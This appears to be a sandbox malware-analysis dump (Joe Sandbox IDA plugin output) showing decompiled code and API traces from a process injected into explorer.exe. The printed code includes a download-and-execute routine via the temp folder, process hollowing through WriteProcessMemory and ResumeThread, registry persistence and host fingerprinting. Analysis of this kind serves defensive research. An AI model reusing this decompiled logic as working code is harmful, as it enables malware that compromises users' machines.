    0x007784f4
    0x007784f9
    0x007784f9
    0x00778501
    0x0077850b
    0x00778512
    0x00000000
    0x00000000
    0x00778519
    0x00778519
    0x00778521
    0x00778521
    0x00778523
    0x0077852e
    0x00778533
    0x0077853c
    0x0077854a
    0x00778552
    0x0077855c
    0x0077856b
    0x00778571
    0x00778584
    0x0077858c
    0x00778596
    0x007785a5
    0x007785ab
    0x007785be
    0x007785c6
    0x007785d0
    0x007785de
    0x007785e3
    0x007785f3
    0x007785fb
    0x00778605
    0x00778613
    0x00778623
    0x0077862b
    0x00778635
    0x00778646
    0x0077864e
    0x00778658
    0x00778667
    0x0077866d
    0x00778680
    0x00778685
    0x00778688
    0x0077868f
    0x0077869c
    0x007786a1
    0x007786a1
    0x007786a4
    0x007786ae
    0x007786bc
    0x007786cc
    0x007786d4
    0x007786de
    0x007786e3
    0x007786e8
    0x007786f1
    0x007786f4
    0x007786fb
    0x00778702
    0x00778706
    0x00778706
    0x00778717
    0x00778732
    0x00778738
    0x00778749
    0x0077874c
    0x00778750
    0x00000000
    0x00000000
    0x00778756
    0x00778764
    0x0077876a
    0x0077876d
    0x00778772
    0x0077877c
    0x00778786
    0x00778790
    0x00778796
    0x00778798
    0x007788bc
    0x007788bf
    0x00778957
    0x00778957
    0x0077895f
    0x00778965
    0x00778968
    0x0077896d
    0x0077896d
    0x00000000
    0x00778972
    0x007787a0
    0x007787a5
    0x007787a8
    0x007787b6
    0x007787b9
    0x007787bd
    0x007787c8
    0x007787d6
    0x007787bf
    0x007787bf
    0x007787bf
    0x007787d9
    0x007787dd
    0x007787e5
    0x007787ee
    0x007787fe
    0x00778807
    0x00778810
    0x00778816
    0x0077881e
    0x00778831
    0x00778837
    0x00778837
    0x0077883a
    0x00778843
    0x00778843
    0x00778847
    0x0077884b
    0x0077888e
    0x00778893
    0x00778898
    0x0077889a
    0x0077889f
    0x007788a7
    0x007788af
    0x007788b4
    0x007788b6
    0x007788b6
    0x00000000
    0x0077884d
    0x0077884d
    0x0077885b
    0x0077885d
    0x00778884
    0x00000000
    0x00778884
    0x00778862
    0x0077886a
    0x00778872
    0x00778877
    0x00778879
    0x00000000
    0x00778879
    0x0077884b
    0x007788c9
    0x007788ce
    0x007788df
    0x007788e4
    0x00778902
    0x0077890d
    0x00778918
    0x0077891a
    0x00778927
    0x00778937
    0x00778937
    0x00778942
    0x0077894d
    0x0077894d

    APIs
      • Part of subcall function 007713DC: GetProcessHeap.KERNEL32(00000000,?), ref: 007713EB
      • Part of subcall function 007713DC: RtlAllocateHeap.NTDLL(00000000), ref: 007713F2
    • Sleep.KERNEL32(00004E20), ref: 00778519
      • Part of subcall function 007764BC: GetVersionExA.KERNEL32(0000009C), ref: 00776530
      • Part of subcall function 00771864: wsprintfA.USER32 ref: 00771874
      • Part of subcall function 00778258: WSAStartup.WS2_32(00000101,?), ref: 00778276
      • Part of subcall function 00778258: gethostname.WS2_32(?,00000040), ref: 00778282
      • Part of subcall function 00778258: gethostbyname.WS2_32(?), ref: 0077828C
      • Part of subcall function 00778258: inet_ntoa.WS2_32(?), ref: 007782B6
      • Part of subcall function 00778258: WSACleanup.WS2_32 ref: 007782E9
      • Part of subcall function 00774154: GetKeyboardLayoutList.USER32(00000009,?), ref: 00774169
    • GetTickCount.KERNEL32 ref: 007786EB
    • Sleep.KERNEL32(00003A98), ref: 00778706
      • Part of subcall function 00775468: GetSystemTime.KERNEL32(?), ref: 00775472
      • Part of subcall function 00777474: RegCreateKeyExA.ADVAPI32(80000002,007721A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 0077750D
      • Part of subcall function 00777474: RegCreateKeyExA.ADVAPI32(80000001,007721A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00777533
    • RtlExitUserThread.NTDLL(00000000), ref: 007788B6
      • Part of subcall function 007782F8: GetTempPathA.KERNEL32(00000201,?), ref: 00778364
      • Part of subcall function 007782F8: Sleep.KERNEL32(000005DC), ref: 007783E3
      • Part of subcall function 007782F8: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0077840C
      • Part of subcall function 007782F8: wsprintfA.USER32 ref: 00778476
    • RtlExitUserThread.NTDLL(00000000), ref: 00778879
      • Part of subcall function 007780C0: RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 007780DB
      • Part of subcall function 007780C0: CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000), ref: 007780E9
      • Part of subcall function 007780C0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00778106
      • Part of subcall function 007780C0: CloseHandle.KERNEL32(00000000), ref: 00778112
      • Part of subcall function 007780C0: SendMessageA.USER32(0006024A,00000010,00000000,00000000), ref: 00778184
      • Part of subcall function 007780C0: SHDeleteKeyA.SHLWAPI(80000002,007721A4), ref: 007781BB
      • Part of subcall function 007780C0: SHDeleteKeyA.SHLWAPI(80000001,007721A4), ref: 007781FB
      • Part of subcall function 007780C0: ReleaseMutex.KERNEL32(00000230), ref: 00778221
      • Part of subcall function 007780C0: CloseHandle.KERNEL32(00000230), ref: 0077822D
      • Part of subcall function 007780C0: ExitProcess.KERNEL32 ref: 00778244
      • Part of subcall function 00771440: GetProcessHeap.KERNEL32(00000000,?), ref: 0077144D
      • Part of subcall function 00771440: HeapFree.KERNEL32(00000000), ref: 00771454
      • Part of subcall function 0077660C: Sleep.KERNEL32(000927C0), ref: 007766F5
      • Part of subcall function 0077660C: GetTickCount.KERNEL32 ref: 007766FD
      • Part of subcall function 0077660C: GetTickCount.KERNEL32 ref: 007767AF
      • Part of subcall function 0077660C: Sleep.KERNEL32(00001388), ref: 007767CD
      • Part of subcall function 0077660C: Sleep.KERNEL32(000493E0), ref: 007767F3
      • Part of subcall function 0077660C: Sleep.KERNEL32(000927C0), ref: 0077680F
    • Sleep.KERNEL32(000003E8), ref: 0077895F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 95%
    			E0077660C(intOrPtr __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				signed int _v20;
    				signed int _v24;
    				char _v28;
    				char _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				signed int _v44;
    				long _v48;
    				intOrPtr _v52;
    				char _v181;
    				char _v264;
    				char _v329;
    				char _v394;
    				intOrPtr _t116;
    				intOrPtr _t123;
    				signed int _t131;
    				signed int _t151;
    				intOrPtr _t154;
    				signed int _t155;
    				intOrPtr _t175;
    				intOrPtr _t195;
    				void* _t201;
    				void* _t202;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				_v20 = 0;
    				E007764BC( &_v264, 0x51, __eflags);
    				_v36 = E00771110(_v12, E00776900);
    				_v40 = _v36 - _v12;
    				E007712B8( &_v329, _v40, _v12);
    				 *((char*)(_t201 + _v40 - 0x145)) = 0;
    				E00771308( &_v394,  &_v329);
    				_v44 = 1;
    				L1:
    				while(1) {
    					if(_v44 % 0x32 == 0 || _v44 == 1) {
    						L3:
    						_t184 = _a8;
    						_t116 =  *0x77a194; // 0x771e9c
    						_v24 = E00775AE8(_t116, _a8, 0);
    						if(_v24 == 0) {
    							Sleep(0x927c0);
    							goto L3;
    						}
    						_t123 =  *0x77c230; // 0x7723ae
    						_v24 = E00775D20(_t184, _v8, _t123,  &_v264, _v12, _a8, 0, 0,  &_v28,  &_v32);
    						if(_v24 == 0) {
    							goto L7;
    						} else {
    							E00771440(_v28);
    							_v20 = 0;
    							goto L39;
    						}
    					} else {
    						L7:
    						_v48 = GetTickCount();
    						_t195 =  *0x77c230; // 0x7723ae
    						E00776340( &_v329, 0x94, _t195, __eflags);
    						_v24 = 0;
    						_t131 = E00771110(_a4,  &_v329);
    						__eflags = _t131;
    						if(_t131 == 0) {
    							E00771308( &_v181,  &_v329);
    							E0077133C( &_v181, _v36);
    							_t202 = _t202 + 8;
    							_t175 =  *0x77c230; // 0x7723ae
    							_v24 = E00775D20(0x94, _v8, _t175,  &_v264,  &_v181, _a8, 0, 0,  &_v28,  &_v32);
    						}
    						__eflags = _v24;
    						if(_v24 == 0) {
    							_v48 = GetTickCount() - _v48;
    							__eflags = _v48 - 0x1388;
    							if(_v48 < 0x1388) {
    								__eflags = 0x1388;
    								Sleep(0x1388 - _v48);
    							}
    							_v52 = E00775468();
    							__eflags = _v44 - 5;
    							if(_v44 != 5) {
    								L19:
    								__eflags = _v52 - _v16 - 0x3f480;
    								if(_v52 - _v16 >= 0x3f480) {
    									__eflags = _v52 - _v16 - 0x3f480;
    									if(_v52 - _v16 <= 0x3f480) {
    										L28:
    										__eflags = _v52 - _v16 - 0x7e900;
    										if(_v52 - _v16 <= 0x7e900) {
    											L33:
    											__eflags = _v52 - _v16 - 0xd2f00;
    											if(_v52 - _v16 > 0xd2f00) {
    												__eflags = _v44 - 0x12c;
    												if(_v44 != 0x12c) {
    													_t95 =  &_v44;
    													 *_t95 = _v44 + 1;
    													__eflags =  *_t95;
    												} else {
    													_v44 = 1;
    												}
    											}
    											L37:
    											__eflags = _v44 - 1;
    											if(__eflags == 0) {
    												E00771308( &_v329,  &_v394);
    											}
    											continue;
    										}
    										__eflags = _v52 - _v16 - 0xd2f00;
    										if(_v52 - _v16 >= 0xd2f00) {
    											goto L33;
    										}
    										__eflags = _v44 - 0xc8;
    										if(_v44 != 0xc8) {
    											_v44 = _v44 + 1;
    										} else {
    											_v44 = 1;
    										}
    										goto L37;
    									}
    									__eflags = _v52 - _v16 - 0x7e900;
    									if(_v52 - _v16 >= 0x7e900) {
    										goto L28;
    									}
    									__eflags = _v44 - 0x64;
    									if(_v44 != 0x64) {
    										_v44 = _v44 + 1;
    									} else {
    										_v44 = 1;
    									}
    									goto L37;
    								}
    								__eflags = _v44 - 0x32;
    								if(_v44 != 0x32) {
    									_v44 = _v44 + 1;
    								} else {
    									_v44 = 1;
    								}
    								goto L37;
    							} else {
    								__eflags = _v52 - _a16 - 0x927c0;
    								if(_v52 - _a16 >= 0x927c0) {
    									goto L19;
    								}
    								Sleep(0x493e0);
    								_t151 = E00775620();
    								asm("sbb eax, eax");
    								__eflags =  ~( ~_t151);
    								if( ~( ~_t151) == 0) {
    									while(1) {
    										_t154 =  *0x77a194; // 0x771e9c
    										_t155 = E00775AE8(_t154, _a8, 0);
    										asm("sbb eax, eax");
    										__eflags =  ~( ~_t155);
    										if( ~( ~_t155) != 0) {
    											goto L19;
    										}
    										Sleep(0x927c0);
    									}
    								}
    								goto L19;
    							}
    						} else {
    							E00771308(_a12,  &_v181);
    							E00771440(_v28);
    							_v20 = 0xffffffff;
    							L39:
    							return _v20;
    						}
    					}
    				}
    			}

    0x00776615
    0x00776618
    0x0077661b
    0x00776620
    0x0077662b
    0x0077663d
    0x00776646
    0x00776655
    0x0077665d
    0x00776671
    0x00776676
    0x00000000
    0x0077667d
    0x0077668b
    0x00776693
    0x00776693
    0x00776698
    0x007766a2
    0x007766a9
    0x007766f5
    0x00000000
    0x007766f5
    0x007766c6
    0x007766d5
    0x007766dc
    0x00000000
    0x007766de
    0x007766e1
    0x007766e8
    0x00000000
    0x007766e8
    0x007766fd
    0x007766fd
    0x00776703
    0x00776711
    0x00776717
    0x0077671e
    0x0077672a
    0x0077672f
    0x00776731
    0x0077673f
    0x0077674f
    0x00776754
    0x00776775
    0x00776784
    0x00776784
    0x00776787
    0x0077678b
    0x007767b8
    0x007767bb
    0x007767c2
    0x007767c9
    0x007767cd
    0x007767cd
    0x007767d8
    0x007767db
    0x007767df
    0x0077682e
    0x00776834
    0x00776839
    0x0077685b
    0x00776860
    0x00776883
    0x00776889
    0x0077688e
    0x007768b4
    0x007768ba
    0x007768bf
    0x007768c1
    0x007768c8
    0x007768d3
    0x007768d3
    0x007768d3
    0x007768ca
    0x007768ca
    0x007768ca
    0x007768c8
    0x007768d6
    0x007768d6
    0x007768da
    0x007768ec
    0x007768ec
    0x00000000
    0x007768da
    0x00776896
    0x0077689b
    0x00000000
    0x00000000
    0x0077689d
    0x007768a4
    0x007768af
    0x007768a6
    0x007768a6
    0x007768a6
    0x00000000
    0x007768a4
    0x00776868
    0x0077686d
    0x00000000
    0x00000000
    0x0077686f
    0x00776873
    0x0077687e
    0x00776875
    0x00776875
    0x00776875
    0x00000000
    0x00776873
    0x0077683b
    0x0077683f
    0x0077684d
    0x00776841
    0x00776841
    0x00776841
    0x00000000
    0x007767e1
    0x007767e7
    0x007767ec
    0x00000000
    0x00000000
    0x007767f3
    0x007767f9
    0x00776800
    0x00776804
    0x00776806
    0x00776815
    0x0077681a
    0x0077681f
    0x00776826
    0x0077682a
    0x0077682c
    0x00000000
    0x00000000
    0x0077680f
    0x0077680f
    0x00776815
    0x00000000
    0x00776806
    0x0077678d
    0x00776796
    0x0077679e
    0x007767a3
    0x007768f6
    0x007768fc
    0x007768fc
    0x0077678b
    0x0077668b

    APIs
      • Part of subcall function 007764BC: GetVersionExA.KERNEL32(0000009C), ref: 00776530
    • Sleep.KERNEL32(000927C0), ref: 007766F5
    • GetTickCount.KERNEL32 ref: 007766FD
      • Part of subcall function 00771440: GetProcessHeap.KERNEL32(00000000,?), ref: 0077144D
      • Part of subcall function 00771440: HeapFree.KERNEL32(00000000), ref: 00771454
    • GetTickCount.KERNEL32 ref: 007767AF
    • Sleep.KERNEL32(00001388), ref: 007767CD
      • Part of subcall function 00775468: GetSystemTime.KERNEL32(?), ref: 00775472
    • Sleep.KERNEL32(000493E0), ref: 007767F3
    • Sleep.KERNEL32(000927C0), ref: 0077680F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 100%
    			E007782F8(intOrPtr __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v541;
    				char _v1054;
    				struct _STARTUPINFOA _v1124;
    				struct _PROCESS_INFORMATION _v1140;
    				intOrPtr _t41;
    				intOrPtr _t57;
    				intOrPtr _t62;
    				intOrPtr _t66;
    				intOrPtr _t77;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				_v20 = 0;
    				_v24 = E00777CFC(_v12);
    				E00771258( &_v1124, 0x44);
    				_v1124.cb = 0x44;
    				if(_v24 == 0) {
    					_t41 =  *0x77a168; // 0x771dec
    					E00777290(_t41);
    				} else {
    					_v28 = E00771110(_v8, 0x778494);
    					_t96 = _v28;
    					if(_v28 != 0) {
    						GetTempPathA(0x201,  &_v1054);
    						E00777560( &_v1054, 0x778494, _t96);
    						E00771308( &_v541, 0x77849c);
    						E0077133C( &_v541,  &_v1054);
    						E0077133C( &_v541, 0x77849c);
    						_t57 =  *0x77a0a8; // 0x771c4c
    						E0077133C( &_v541, _t57);
    						if( *((char*)(_v28 + 4)) != 0x31) {
    							 *0x77b514 = 0;
    							_t62 =  *0x77b510; // 0x790000
    							E00771828(_t62);
    							E007713B4(0x77b510, _v16);
    							_t66 =  *0x77b510; // 0x790000
    							E007712B8(_t66, _v16, _v12);
    							 *0x77b514 = _v16;
    							 *0x77be1c = 0;
    							wsprintfA("1530474054", 0x7784a0, _v24);
    						} else {
    							E0077485C( &_v1054, _v16, _v12);
    							Sleep(0x5dc);
    							if(CreateProcessA(0,  &_v541, 0, 0, 0, 0, 0, 0,  &_v1124,  &_v1140) == 0) {
    								_t77 =  *0x77a174; // 0x771e10
    								E00777290(_t77);
    							} else {
    								_v20 = 0xffffffff;
    							}
    						}
    					}
    				}
    				return _v20;
    			}

    0x00778301
    0x00778304
    0x00778307
    0x0077830c
    0x00778317
    0x00778325
    0x0077832a
    0x00778338
    0x00778481
    0x00778486
    0x0077833e
    0x0077834b
    0x0077834e
    0x00778352
    0x00778364
    0x00778370
    0x00778380
    0x00778393
    0x007783a7
    0x007783af
    0x007783bc
    0x007783cb
    0x0077842d
    0x00778432
    0x00778437
    0x00778444
    0x0077844f
    0x00778454
    0x0077845c
    0x00778461
    0x00778476
    0x007783cd
    0x007783d9
    0x007783e3
    0x00778414
    0x0077841f
    0x00778424
    0x00778416
    0x00778416
    0x00778416
    0x00778414
    0x007783cb
    0x00778352
    0x00778491

    APIs
    • GetTempPathA.KERNEL32(00000201,?), ref: 00778364
    • Sleep.KERNEL32(000005DC), ref: 007783E3
    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0077840C
      • Part of subcall function 00771828: VirtualFree.KERNEL32(?,00000000,00008000,?,?,00776A2F), ref: 0077183A
      • Part of subcall function 007713B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 007713CD
    • wsprintfA.USER32 ref: 00778476
      • Part of subcall function 0077485C: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00774886
      • Part of subcall function 0077485C: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 007748A7
      • Part of subcall function 0077485C: FlushFileBuffers.KERNEL32(000000FF), ref: 007748C4
      • Part of subcall function 0077485C: CloseHandle.KERNEL32(000000FF), ref: 007748CE
      • Part of subcall function 00777290: CreateThread.KERNEL32(00000000,00000000,Function_00007278,?,00000000,?), ref: 007772AC
      • Part of subcall function 00777290: CloseHandle.KERNEL32(?), ref: 007772B9
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 75%
    			E00779347() {
    				intOrPtr _t24;
    				intOrPtr _t32;
    				intOrPtr _t42;
    				intOrPtr* _t47;
    				intOrPtr* _t49;
    				void* _t51;
    
    				if( *_t49() != 0) {
    					 *_t47(0);
    				}
    				if(E0077453C(GetCurrentProcess()) == 0) {
    					GetWindowsDirectoryA(_t51 - 0x218, 0x101);
    					E0077133C(_t51 - 0x218, 0x77946c);
    				} else {
    					GetWindowsDirectoryA(_t51 - 0x218, 0x101);
    					_t42 =  *0x77a0b0; // 0x771c64
    					E0077133C(_t51 - 0x218, _t42);
    				}
    				_t24 =  *0x77a08c; // 0x771c00
    				E0077133C(_t51 - 0x218, _t24);
    				 *((intOrPtr*)(_t51 - 0xc)) = E00775028(_t51 - 0x218, 0, E00779080, _t51 - 0x117, 0xffffffff, 0xfa0);
    				if( *((intOrPtr*)(_t51 - 0xc)) == 0xffffffff) {
    					 *0x77b21c(0, _t51 - 0x218, 0x26, 0xffffffff);
    					_t32 =  *0x77a0dc; // 0x771ce8
    					E0077133C(_t51 - 0x218, _t32);
    					if(PathFileExistsA(_t51 - 0x218) != 0) {
    						 *((intOrPtr*)(_t51 - 0xc)) = E00775028(_t51 - 0x218, 0, E00779080, _t51 - 0x117, 0xffffffff, 0xfa0);
    					}
    				}
    				ExitProcess(0);
    			}

    0x0077934c
    0x00779350
    0x00779352
    0x00779366
    0x0077939d
    0x007793af
    0x00779368
    0x00779374
    0x0077937a
    0x00779387
    0x0077938c
    0x007793b7
    0x007793c4
    0x007793f0
    0x007793f7
    0x00779406
    0x0077940c
    0x00779419
    0x00779430
    0x00779456
    0x00779456
    0x00779430
    0x0077945b

    APIs
    • GetCurrentProcess.KERNEL32 ref: 00779359
      • Part of subcall function 0077453C: GetCurrentProcess.KERNEL32 ref: 00774555
      • Part of subcall function 0077453C: IsWow64Process.KERNELBASE(00000000,?), ref: 0077456F
    • GetWindowsDirectoryA.KERNEL32(?,00000101), ref: 00779374
    • GetWindowsDirectoryA.KERNEL32(?,00000101), ref: 0077939D
      • Part of subcall function 00775028: GetModuleHandleA.KERNEL32(00000000), ref: 00775040
      • Part of subcall function 00775028: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0077508F
      • Part of subcall function 00775028: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,?), ref: 007750F5
      • Part of subcall function 00775028: MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 0077510D
      • Part of subcall function 00775028: GetThreadContext.KERNEL32(?,00010007), ref: 00775209
      • Part of subcall function 00775028: VirtualProtectEx.KERNEL32(?,00000000,0000029B,00000040,?), ref: 00775252
      • Part of subcall function 00775028: WriteProcessMemory.KERNEL32(?,00000000,?,0000029B,?), ref: 0077526C
      • Part of subcall function 00775028: ResumeThread.KERNEL32(?), ref: 0077527E
      • Part of subcall function 00775028: WaitForSingleObject.KERNEL32(?,00000000), ref: 00775292
      • Part of subcall function 00775028: GetExitCodeProcess.KERNEL32(?,?), ref: 007752A4
      • Part of subcall function 00775028: CloseHandle.KERNEL32(?), ref: 007752BE
      • Part of subcall function 00775028: CloseHandle.KERNEL32(?), ref: 007752C8
    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,000000FF), ref: 00779406
    • PathFileExistsA.SHLWAPI(?), ref: 00779428
    • ExitProcess.KERNEL32 ref: 0077945B
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 100%
    			E00777C4E(CHAR* __eax) {
    				CHAR* _v8;
    				intOrPtr _v12;
    				void* _v16;
    				long _v20;
    				intOrPtr _v24;
    				void _v84;
    				intOrPtr _v100;
    				void _v104;
    
    				_v8 = __eax;
    				_v12 = 0;
    				_v16 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0, 0);
    				if(_v16 == 0xffffffff) {
    					_v16 = CreateFileA(_v8, 0x80000000, 0, 0, 3, 0, 0);
    				}
    				if(_v16 != 0xffffffff) {
    					ReadFile(_v16,  &_v84, 0x40,  &_v20, 0);
    					SetFilePointer(_v16, _v24 + 4, 0, 0);
    					ReadFile(_v16,  &_v104, 0x14,  &_v20, 0);
    					CloseHandle(_v16);
    					_v12 = _v100;
    				}
    				return _v12;
    			}

    0x00777c56
    0x00777c5b
    0x00777c77
    0x00777c7e
    0x00777c99
    0x00777c99
    0x00777ca0
    0x00777cb2
    0x00777cc7
    0x00777cdd
    0x00777ce7
    0x00777cf0
    0x00777cf0
    0x00777cf9

    APIs
    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00777C71
    • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00777C93
    • ReadFile.KERNEL32(000000FF,?,00000040,?,00000000), ref: 00777CB2
    • SetFilePointer.KERNEL32(000000FF,?,00000000,00000000), ref: 00777CC7
    • ReadFile.KERNEL32(000000FF,?,00000014,?,00000000), ref: 00777CDD
    • CloseHandle.KERNEL32(000000FF), ref: 00777CE7
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 100%
    			E00777C50(CHAR* __eax) {
    				CHAR* _v8;
    				intOrPtr _v12;
    				void* _v16;
    				long _v20;
    				intOrPtr _v24;
    				void _v84;
    				intOrPtr _v100;
    				void _v104;
    
    				_v8 = __eax;
    				_v12 = 0;
    				_v16 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0, 0);
    				if(_v16 == 0xffffffff) {
    					_v16 = CreateFileA(_v8, 0x80000000, 0, 0, 3, 0, 0);
    				}
    				if(_v16 != 0xffffffff) {
    					ReadFile(_v16,  &_v84, 0x40,  &_v20, 0);
    					SetFilePointer(_v16, _v24 + 4, 0, 0);
    					ReadFile(_v16,  &_v104, 0x14,  &_v20, 0);
    					CloseHandle(_v16);
    					_v12 = _v100;
    				}
    				return _v12;
    			}

    0x00777c56
    0x00777c5b
    0x00777c77
    0x00777c7e
    0x00777c99
    0x00777c99
    0x00777ca0
    0x00777cb2
    0x00777cc7
    0x00777cdd
    0x00777ce7
    0x00777cf0
    0x00777cf0
    0x00777cf9

    APIs
    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00777C71
    • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00777C93
    • ReadFile.KERNEL32(000000FF,?,00000040,?,00000000), ref: 00777CB2
    • SetFilePointer.KERNEL32(000000FF,?,00000000,00000000), ref: 00777CC7
    • ReadFile.KERNEL32(000000FF,?,00000014,?,00000000), ref: 00777CDD
    • CloseHandle.KERNEL32(000000FF), ref: 00777CE7
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 92%
    			E00774A68(intOrPtr __eax) {
    				intOrPtr _v8;
    				signed int _v12;
    				long _v16;
    				signed int _v20;
    				void* _v24;
    				char _v153;
    				int _t30;
    				char* _t32;
    				intOrPtr _t37;
    				signed int _t52;
    				signed char _t62;
    				intOrPtr _t67;
    
    				_v8 = __eax;
    				_v12 = 0;
    				_v16 = 0x81;
    				_t30 = GetComputerNameA( &_v153,  &_v16);
    				_t72 = _t30;
    				if(_t30 != 0) {
    					_v12 = E00771740( &_v153);
    				}
    				_t32 =  *0x77a25c; // 0x772174
    				RegOpenKeyExA(0x80000002, _t32, 0, 0x20119,  &_v24);
    				_v16 = 4;
    				_v20 = 0;
    				_t37 =  *0x77a0f0; // 0x771d3c
    				E007738B0(_v24, _t37, 0, 0,  &_v20,  &_v16);
    				E00773890(_v24);
    				_v12 = _v12 ^ _v20 ^ 0x4c8aa297;
    				E00771164(_v12,  &_v153);
    				 *0x77a064 = E007744F0(_t72);
    				 *0x77a068 = E007742D4(GetCurrentProcess());
    				if(E007744F0(_t72) >= 0x3c) {
    					_t52 = E007742D4(GetCurrentProcess());
    					__eflags = _t52 - 3;
    					_t21 = _t52 == 3;
    					__eflags = _t21;
    					asm("sbb eax, eax");
    					 *0x77a034 =  ~(_t52 & 0xffffff00 | _t21);
    				} else {
    					_t62 = E007741CC();
    					asm("sbb eax, eax");
    					 *0x77a034 =  ~_t62;
    				}
    				if( *0x77a034 != 0) {
    					_t67 =  *0x77a09c; // 0x771c30
    					E00771308(_v8, _t67);
    				}
    				E0077133C(_v8, 0x774b9c);
    				return E0077133C(_v8,  &_v153);
    			}

    0x00774a71
    0x00774a76
    0x00774a79
    0x00774a8b
    0x00774a91
    0x00774a93
    0x00774aa0
    0x00774aa0
    0x00774aae
    0x00774ab9
    0x00774abf
    0x00774ac8
    0x00774ad7
    0x00774ae1
    0x00774aec
    0x00774afc
    0x00774b08
    0x00774b12
    0x00774b22
    0x00774b2f
    0x00774b47
    0x00774b4c
    0x00774b4f
    0x00774b4f
    0x00774b54
    0x00774b56
    0x00774b31
    0x00774b31
    0x00774b38
    0x00774b3a
    0x00774b3a
    0x00774b62
    0x00774b64
    0x00774b6d
    0x00774b6d
    0x00774b7b
    0x00774b99

    APIs
    • GetComputerNameA.KERNEL32(?,00000081), ref: 00774A8B
    • RegOpenKeyExA.ADVAPI32(80000002,00772174,00000000,00020119,?), ref: 00774AB9
      • Part of subcall function 007738B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00776992,?,00771D3C,00000000,00000000,?,?), ref: 007738CC
      • Part of subcall function 00773890: RegCloseKey.ADVAPI32(?), ref: 0077389D
      • Part of subcall function 007744F0: GetVersionExA.KERNEL32(0000009C), ref: 0077451A
    • GetCurrentProcess.KERNEL32 ref: 00774B17
      • Part of subcall function 007742D4: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 007742EC
      • Part of subcall function 007742D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 0077430E
      • Part of subcall function 007742D4: GetLastError.KERNEL32 ref: 00774322
      • Part of subcall function 007742D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00774358
      • Part of subcall function 007742D4: GetSidSubAuthorityCount.ADVAPI32(?), ref: 0077436E
      • Part of subcall function 007742D4: GetSidSubAuthority.ADVAPI32(?,?), ref: 00774393
      • Part of subcall function 007742D4: CloseHandle.KERNEL32(?), ref: 007743F3
    • GetCurrentProcess.KERNEL32 ref: 00774B41
      • Part of subcall function 007741CC: GetCurrentThread.KERNEL32 ref: 007741DE
      • Part of subcall function 007741CC: OpenThreadToken.ADVAPI32(00000000), ref: 007741E5
      • Part of subcall function 007741CC: GetLastError.KERNEL32 ref: 007741F4
      • Part of subcall function 007741CC: GetCurrentProcess.KERNEL32 ref: 00774207
      • Part of subcall function 007741CC: OpenProcessToken.ADVAPI32(00000000), ref: 0077420E
      • Part of subcall function 007741CC: GetTokenInformation.ADVAPI32(?,00000002,?,00000400,?), ref: 00774241
      • Part of subcall function 007741CC: CloseHandle.KERNEL32(?), ref: 0077424E
      • Part of subcall function 007741CC: AllocateAndInitializeSid.ADVAPI32(0077A2A4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00774278
      • Part of subcall function 007741CC: EqualSid.ADVAPI32(?,?), ref: 007742A2
